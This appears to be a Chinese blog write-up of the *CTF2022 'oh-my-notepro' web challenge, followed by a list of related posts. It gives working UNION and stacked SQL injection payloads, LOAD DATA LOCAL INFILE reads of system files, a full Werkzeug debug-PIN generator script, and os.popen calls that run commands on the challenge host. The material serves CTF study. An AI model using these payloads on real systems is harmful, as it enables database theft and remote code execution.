*CTF2022 oh-my-notepro

已于 2022-04-20 09:37:35 修改
阅读量1k 收藏
点赞数 1
分类专栏: 比赛wp 文章标签: CTF Web
于 2022-04-19 16:23:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/124244296
版权

*CTF2022 oh-my-notepro

文章目录

登录挺宽松就登录了,note-id是在sql数据库中查找的,可以得到notes表名

在这里插入图片描述

sql注入

存在sql注入,查看回显点

%27union%20select%201,2,3,4,5;%23
4 5 都是

在这里插入图片描述

版本号
%27union%20select%201,2,3,version(),version();%23

在这里插入图片描述

查看数据库名称

%27union%20select%201,2,3,version(),database();%23

在这里插入图片描述

读表名

%27union%20select%201,2,3,version(),(select%20group_concat(table_name)%20from%20information_schema.tables);%23

注意看最后的那里,和我们的报错是一样的,有notes表,证实了这一点

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,OPTIMIZER_TRACE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,INNODB_LOCKS,INNODB_TRX,INNODB_SYS_DATAFILES,INNODB_LOCK_WAITS,INNODB_SYS_TABLESTATS,INNODB_CMP,INNODB_METRICS,INNODB_CMP_RESET,INNODB_CMP_PER_INDEX,INNODB_CMPMEM_RESET,INNODB_FT_DELETED,INNODB_BUFFER_PAGE_LRU,INNODB_SYS_FOREIGN,INNODB_SYS_COLUMNS,INNODB_SYS_INDEXES,INNODB_FT_DEFAULT_STOPWORD,INNODB_SYS_FIELDS,INNODB_CMP_PER_INDEX_RESET,INNODB_BUFFER_PAGE,INNODB_CMPMEM,INNODB_FT_INDEX_TABLE,INNODB_FT_BEING_DELETED,INNODB_SYS_TABLESPACES,INNODB_FT_INDEX_CACHE,INNODB_SYS_FOREIGN_COLS,INNODB_SYS_TABLES,INNODB_BUFFER_POOL_STATS,INNODB_FT_CONFIG,notes,users

查看users表

%27union%20select%201,2,3,version(),(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27);%23
得到
id,username,password

查看username和password

在这里插入图片描述

%27union%20select%201,2,3,version(),(select%20group_concat(username,0x3a,password)%20from%20users);%23
root:202cb962ac59075b964b07152d234b70

但是有了这个root和密码,不过好像没啥用

换个思路

读文件,得pin码

loadfiled读文件,通过flask开启了debug模式,然后通过pin码进行RCE

可以读文件之后,题目就和[GYCTF2020]FlaskApp这个题目很相似了,读一些文件,然后通过大佬的脚本得到pin码

1. 用户名

';create table aaa(name varchar(1000));load data local infile "/etc/passwd" into table ctf.aaa;%23
'union%20select%201,2,3,4,(select%20group_concat(name)%20from%20ctf.aaa);%23

在这里插入图片描述

在/etc/passwd中可以得到用户名:ctf

2. app.py路径

在这里插入图片描述

3. 读mac

';create table bbb(name varchar(1000));load data local infile "/sys/class/net/eth0/address" into table ctf.bbb;%23

'union select 1,2,3,4,(select group_concat(name) from ctf.bbb);%23

在这里插入图片描述

将mac地址去掉;,然后在python中进行转化

02:42:c0:a8:90:03
print(int('0242ac1f0003',16))
2485723369475

4. 读/etc/machine-id

';create table machine(name varchar(1000));load data local infile "/etc/machine-id" into table ctf.machine;%23

'union select 1,2,3,4,(select GROUP_CONCAT(name) from ctf.machine)%23

1cc402dd0e11d5ae18db04a6de87223d

在这里插入图片描述

5. 读/proc/self/cgroup

';create table cc(name varchar(1000));load data local infile "/proc/self/cgroup" into table ctf.cc;%23

'union select 1,2,3,4,(select group_concat(name) from ctf.cc);%23

在这里插入图片描述

9cfbff4dca5ae8bd5f82dad5b7b30f43bc41fcde7cf41bdfa213e96595e05ff7

exp

注意exp的变化,Werkzeug的更新给pin码计算带来了新的变化
直接看官方wp的解释
在这里插入图片描述

  1. md5–>sha1
  2. /etc/machine-id+/proc/self/cgroup中的id,二者拼接
#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'ctf' #使用用户名
    'flask.app', #默认的
    'Flask', #默认的
    '/usr/local/lib/python3.8/site-packages/flask/app.py'   #这个通过报错信息得到
]

private_bits = [
    '2485723369475',  # 转化之后的mac
    #这个是machine-id和/proc/self/cgroup的综合体
    '1cc402dd0e11d5ae18db04a6de87223d9cfbff4dca5ae8bd5f82dad5b7b30f43bc41fcde7cf41bdfa213e96595e05ff7'
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

访问http://121.37.153.47:5002/console#

输入pin,导入os模块,查看根目录,运行/readflag

import os
os.popen('ls /').read()
os.popen('/readflag').read()

在这里插入图片描述

Sk1y
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
虎符CTF 2022 mva
weixin_46483787的博客
03-21 975
前言: 昨天刚结束的虎符CTF的一道题,开始的太晚了,比赛结束半个小时才做出来,略显可惜 逆向分析: 拿到程序,稍做处理后可以看到,首先是让我们输入一段0x100的字节,然后开始取指-执行-取指-执行的过程,实现了一个小型的计算系统 然后我们简单的进行一些重命名,识别出一些结构来: 如push和pop: 设置寄存器的值 以及一些加减乘除和寄存器赋值等操作就不一一放截图了 漏洞 我们熟知VM的题漏洞基本都是边界检测的问题,sp的检测啊,寄存器指针的检测啊等等,本题也不例外 首先发现的是这两个地方: c
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
oh-my-notepro
shinygod的博客
04-21 1541
知识点:求pin码 登录页面后测试可以发现在note_id处可以sql注入。 %27union%20select%201,2,3,version(),(select%20group_concat(username,0x3a,password)%20from%20users);%23 可以得到用户名和密码,但用处不大。 pin码 可以用pin码登录控制台来 3.8的pin码计算脚本如下,需要以下信息: username,用户名,可以读取/etc/passwd得到 modname,默认值为flask
*CTF2022 - Web
weixin_51804748的博客
04-17 2954
oh-my-grafana Grafana是一款用Go语言开发的开源数据可视化工具,可以做数据监控和数据统计,带有告警功能。 本题使用的Grafana版本为8.2.6,存在任意文件读取的漏洞(CVE-2021-43798) 由于本题需要登录,首先考虑能不能读取到grafana.ini,获取用户名和密码 在ini文件中搜索得到admin的用户名和密码,成功登录 [security] # disable creation of admin user on first start of grafana ;di
*CTF 2022 | 这*CTF打了有什么效果吗?
Cyberpeace的博客
03-21 537
听说*CTF 2022定在04月16日了......这是可以说的吗?
*CTF-2022 examination 题解
CoLin的pwn小屋
04-23 1866
*CTF 2022 examination 题解
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
ctf拼图例题-puzzle
04-13
关于puzzle例题的原题资源,搭配文章使用更配噢 https://editor.csdn.net/md/?articleId=124139016
CTF-Tools-v1.3.7.zip
最新发布
01-29
CTF常用工具集
CTFNote:CTFNote是一种协作工具,旨在帮助CTF团队组织工作
04-12
周大福 欢迎 CTFNote是一种协作工具,旨在帮助CTF团队组织工作。 安装 使用提供的docker配置来部署项目: $ docker-compose up -d 然后,访问127.0.0.1并创建您的第一个帐户,该帐户将自动具有管理员权限 您可以根据需要选择编辑API配置文件: 礼遇 ADMIN_ALL:可以创建CTF,任务,编辑用户/配置。 EDIT_CTF:可以创建和修改CTF信息; 您应该将此权利授予您的队长 CTF_ALL:可以加入每个CTF; 您应该将此权利授予您的团队成员。 无权限:只能在受邀时查看CTF; 这用于不定期的客人。 允许CTF来宾创建和编辑任务,但不允许创建和编辑任务。 发展 开发服务器包括一个简单的HTTP代理,允许前端访问本地API(cf )。 同时在两个组件上都配置了热重装。 设置并启动前端 $ cd front/ $ yarn instal
HackPack CTF 2022 WriteUp
04-09 930
文章目录pwn-Terminal Overdriveweb-Imported Kimchi 1web-Imported Kimchi 2rev-3T PHON3 HOM3rev-Self-Hosted Cryptorev-Shopkeeper 1rev-Shopkeeper 2rev-Shopkeeper 3 pwn-Terminal Overdrive # -*- coding: utf-8 -*- from pwn import * r = remote('cha.hackpack.club',1099
VishwaCTF 2022 部分wp
qq_61768489的博客
03-22 3868
学长推荐的一个相对平易近人的ctf,对我这种菜鸡友好一点, 就想着web要多写几道出来毕竟简单的比赛不常见, 继续加油积累经验吧 My Useless Website 一个最简单的sql 万能密码注入 Stock Bot 注意源码,有hint, 主要就是注意到这个提示了,根据路径直接查Flag Hey Buddy! 这题考点是SSTI ,大佬们也许一眼就看出来了,所谓经验重要性 我这里也就是猜的,然后看到这里get传入name,就很可能 所以先尝试一下...
*CTF MineGame
寻梦&之璐
01-17 265
MineGame 其实呢,也就是一道搜索字符串的题目,只不过这个exe的时间超短,就两秒。。。。 第一步 然后点进游戏去,用CE把它加载进去,注意,得等程序加载完成,最起码棋盘你得让它初始化完,然后再进行字符串搜索,否则刚开始的时候,搜索字符串是没有任何东西的。 第二步 加载之后,得用CE把程序暂停,点击左下角的高级选项里面 然后有一个暂停按钮,点击一下即可 第三步 搜索字符串,注意点: windows内存是UNICODE编码(即宽字节)来存储(因为CE扫的本身就是windows内存) 而且还是小
XCTF-*CTF2022-Alice系列挑战write up
qq_42940521的博客
04-18 6327
*CTF2022 Alice系列题目write up
*CTF-2022 WEB
qq_53263789的博客
04-24 857
oh-my-notepro python3.8 pin码计算 发现sql注入,可以堆叠注入 生成要素 username, 通过getpass.getuser()读取,通过文件读取/etc/passwd modname, 通过getattr(mod,“file”,None)读取,默认值为flask.app appname, 通过getattr(app,“name”,type(app).name)读取,默认值为Flask moddir, 在flask库下app..
*CTF babynote 复现
weixin_45209963的博客
04-26 2830
*CTF babynote 复现
[BDSec CTF 2022] 部分WP
weixin_52640415的博客
07-22 1881
BDSEC CTF 2022
CTF notebook
zero
08-11 843
Debug=0 Local=1 Frida=0 Debug_pwntools=1 #常量 Local_path='./notebook' Remote_addr='' Port=1 frida_script_path='./frida.js' ...
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以查看目录下的全部文件。\[2\]在这个题目中,flag被隐藏在网页源代码中。\[3\]为了防止命令注入漏洞,可以对用户输入进行过滤,例如过滤空格。 #### 引用[.reference_title] - *1* *2* [CTFHub -技能树 命令注入-无过滤](https://blog.csdn.net/qq_45653588/article/details/107556087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFhub——命令执行](https://blog.csdn.net/qq_43277152/article/details/113649643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值